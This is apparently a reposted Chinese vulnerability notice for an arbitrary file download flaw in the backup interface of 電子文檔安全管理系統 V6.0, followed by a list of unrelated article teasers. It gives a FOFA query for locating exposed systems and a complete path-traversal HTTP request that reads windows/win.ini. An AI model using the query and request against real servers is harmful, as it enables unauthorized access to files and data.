電子文檔安全管理系統V6.0接口backup存在任意文件下載漏洞

免責聲明:本號提供的網絡安全信息僅供參考,不構成專業建議。作者不對任何由于使用本文信息而導致的直接或間接損害承擔責任。如涉及侵權,請及時與我聯系,我將盡快處理并刪除相關內容。

漏洞描述

電子文檔安全管理系統 V6.0 resources/backup存在任意文件下載漏洞,攻擊者可通過該漏洞獲取服務器所有文件信息。

搜索語法

FOFA:body="docsafe/docsafe.nocache.js"?

漏洞再現

GET /resources/backup//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1
Host:?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

?

修復建議

禁用特殊字符,限制文件讀取路徑。關注廠商官網信息,及時更新版本?

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/74133.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/74133.shtml
英文地址,請注明出處:http://en.pswp.cn/web/74133.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

5.3 MVVM模型

一、MVVM的基本概念 MVVM的基本概念:Model、View、ViewModel 組件職責示例內容Model封裝業務數據User類,包含姓名、年齡屬性View負責UI呈現XAML界面,包含數據綁定ViewModel連接View和Model,處理視圖邏輯MainViewModel包含命令和…

python采集淘寶拍立淘按圖搜索API接口,json數據示例參考

以下是關于淘寶拍立淘按圖搜索API接口的詳細說明及JSON數據示例: 一、接口概述 淘寶拍立淘按圖搜索API接口是淘寶開放平臺提供的一項基于圖像識別技術的服務,允許開發者通過上傳商品圖片,獲取與圖片相似或相同的商品列表。該接口廣泛應用于…

每天學一個 Linux 命令(8):ls

大家好,歡迎來到《每天掌握一個Linux命令》系列。在這個系列中,我們將逐步學習并熟練掌握Linux命令,今天,我們要學習的命令是ls。 01 什么是ls命令 在Linux系統中,ls命令是“list”的縮寫,其英文全稱為“list directory contents”,即“列出目錄內容”。該命令非常實用…

00.【Linux系統編程】 Linux初識(云服務器設置CentOS并使用、Xshell鏈接云服務器)

目錄 一、華為云服務器免費體驗申請 二、Xshell遠程鏈接創建好的華為云服務器 2.1 下載Xshell 2.2 Xshell遠程連接華為云服務器 一、華為云服務器免費體驗申請 華為云官網 1. 進入華為云官網,最上面一欄點活動,并進入免費體驗中心。 2. 找到含有“…

arm非對齊訪問編譯器選項

gcc編譯選項: -munaligned-access gcc編譯選項: -mno-unaligned-access Enables (or disables) reading and writing of 16- and 32- bit values from addresses that are not 16- or 32- bit aligned. By default unaligned access is disabled for…

jmeter線程組高并發(詳細講解)

在 JMeter 中,線程組是測試計劃的核心組件,用于定義虛擬用戶(線程)的行為。線程組的屬性決定了測試的并發用戶數、加載速度、運行時間等。以下是線程組屬性的詳細講解: 1. 名稱(Name) 定義&…

vs2022中使用spdlog、C++日志

spdlog::set_level(spdlog::level::info); // 只顯示info及比info高級的信息,trace 和 debug 不顯示 參考:Windows10中使用VS2022和Cmake編譯構建C開源日志庫-spdlog-騰訊云開發者社區-騰訊云 spdlog C日志管理 | 快速上手教程 - 知乎 1.按照上述步驟…

SOME/IP-SD -- 協議英文原文講解10

前言 SOME/IP協議越來越多的用于汽車電子行業中,關于協議詳細完全的中文資料卻沒有,所以我將結合工作經驗并對照英文原版協議做一系列的文章。基本分三大塊: 1. SOME/IP協議講解 2. SOME/IP-SD協議講解 3. python/C舉例調試講解 5.1.5 Non…

STM32 ADC轉換完成回調函數詳解 HAL_ADC_ConvCpltCallback與HAL_ADC_ConvHalfCpltCallback

HAL_ADC_ConvCpltCallback 和 HAL_ADC_ConvHalfCpltCallback 是 STM32 HAL 庫中用于處理 ADC(模數轉換器)轉換完成事件的回調函數。它們分別在 ADC 轉換完成和轉換完成一半時被調用。以下是它們的詳細說明: 1. HAL_ADC_ConvCpltCallback 功能…

Android OpenGLES 360全景圖片渲染(球體內部)

概述 360度全景圖是一種虛擬現實技術,它通過對現實場景進行多角度拍攝后,利用計算機軟件將這些照片拼接成一個完整的全景圖像。這種技術能夠讓觀看者在虛擬環境中以交互的方式查看整個周圍環境,就好像他們真的站在那個位置一樣。在Android設備…

代碼隨想錄算法訓練營第三十二天 | 509.斐波那契數 70.爬樓梯 746.使用最小花費爬樓梯

509. 斐波那契數 題目鏈接:509. 斐波那契數 - 力扣(LeetCode) 文章講解:代碼隨想錄 視頻講解:手把手帶你入門動態規劃 | LeetCode:509.斐波那契數_嗶哩嗶哩_bilibili 思路:輸入:…

拼多多 anti-token unidbg 分析

聲明: 本文章中所有內容僅供學習交流使用,不用于其他任何目的,抓包內容、敏感網址、數據接口等均已做脫敏處理,嚴禁用于商業用途和非法用途,否則由此產生的一切后果均與作者無關! 逆向分析 版本7.3-7.4 都試過加密沒什…

【工具】BioPred一個用于精準醫療中生物標志物分析的 R 軟件包

介紹 R 語言包 BioPred 提供了一系列用于精準醫療中的亞組分析和生物標志物分析的工具。它借助極端梯度提升(XGBoost)算法,并結合傾向得分加權和 A 學習方法,幫助優化個體化治療規則,從而簡化亞組識別過程。BioPred 還…

橫掃SQL面試——時間序列分組與合并(會話劃分)問題

橫掃SQL面試題 📌 時間序列分組與合并問題 📚 橫掃SQL面試——時間序列分組與合并解析 🌟 核心問題類型 時間序列分組(Sessionization) 處理具有時間維度的連續數據流,根據特定規則(如時間間隔…

PCB鉆孔之多邊形孔分析

問題分析 在鉆孔過程中,鉆頭的運動可以分為兩部分: 公轉:鉆頭的軸線繞理想軸線(鉆孔中心線)做圓周運動。自轉:鉆頭繞自身軸線做旋轉運動。 由于公轉和自轉的疊加,鉆尖的運動軌跡會形成復雜的…

Android源碼之App啟動

目錄 App啟動概述 App啟動過程 App啟動過程圖 源碼概述 跨進程啟動 進程內啟動 下面以應用桌面Launcher啟動App的MainActivity來舉例: App啟動概述 首先,MainActivity是由Launcher組件來啟動的,而Launcher又是通過Activity管理服務Act…

指紋瀏覽器技術解析:如何實現多賬號安全運營與隱私保護

瀏覽器指紋的挑戰與需求 在數字化運營場景中,瀏覽器指紋技術被廣泛用于追蹤用戶行為。通過采集設備硬件參數(如屏幕分辨率、操作系統)、軟件配置(如字體、插件)及網絡特征(如IP地址、時區)&…

生活電子常識——cmd不能使用anaconda的python環境,導致輸入python打開應用商店

前言 電腦已經安裝了anaconda,從自帶的Anaconda Prompt (Anaconda3)中是可以識別python環境的,然而切換到cmd時,突然發現cmd中無法識別anaconda的python環境,竟然打開了應用商店讓我安裝Python,這當然是不對的。 解決 這是因為…

搭建前端環境和后端環境

搭建前端環境 ①、安裝vscode,并安裝相應的插件工具 ②、安裝node.js,可以選擇當前版本,或者其他版本 ③、創建工作區 創建一個空文件夾,然后通過vscode工具打開,保存為后綴名為.code-workspace ④、從gitee…

Java基礎知識總結(1.8)——Java 注解(持續更新)

更新時間:2025-03-31 Web后端專欄:CSDN專欄——理論-Web后端技術博客總目錄:計算機技術系列博客——目錄頁 8.1 注解的概念 8.1.1 定義與作用 Java注解(Annotation)是Java語言自JDK1.5版本引入的核心特性&#xff0…